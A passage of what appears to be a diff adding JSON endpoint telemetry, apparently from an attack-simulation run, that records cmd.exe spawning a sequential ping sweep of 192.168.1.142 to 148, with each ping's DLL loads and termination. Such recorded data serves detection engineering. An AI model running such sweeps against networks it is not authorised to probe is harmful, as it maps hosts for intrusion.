131883572676830000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.142", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2284, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": 
"C:\\Windows\\System32\\ntdll.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572676980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "event_type": "process", + "pid": 2284, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572681990000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.143", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2908, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572682130000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": 
"C:\\Windows\\System32\\PING.EXE", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572682140000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572682140000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572682140000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572682140000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572682140000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572682140000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572682140000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572682140000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572682140000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572682140000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572682140000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "event_type": "process", + "pid": 2908, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572686830000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.144", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4956, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 
131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572686980000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "event_type": "process", + "pid": 4956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572691990000, + "unique_pid": "{42FC7E13-CB94-5C05-0000-0010D6F35201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.145", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3152, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572692130000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572692140000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572692140000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572692140000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572692140000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
"timestamp": 131883572692140000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572692140000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572692140000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572692140000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572692140000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572692140000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572692140000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "event_type": "process", + 
"pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572696830000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-001046F65201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.146", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3324, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572697029984, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572696980000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572696980000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572696980000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572696980000, + 
"unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572696980000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572696980000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572696980000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572696980000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572696980000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572696980000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + 
"image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572696980000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "event_type": "process", + "pid": 3324, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572701990000, + "unique_pid": "{42FC7E13-CB95-5C05-0000-0010C8F85201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.147", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4548, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572702140000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572702140000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572702140000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572702140000, + "unique_pid": 
"{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572702140000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572702140000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572702140000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572702140000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572702140000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572702140000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + 
"image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572702140000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572702140000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "event_type": "process", + "pid": 4548, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572706830000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-001038FB5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.148", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5296, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572706990000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572706980000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572706980000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" 
+ }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572706980000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572706980000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572706980000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572706980000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572706980000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572706980000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": 
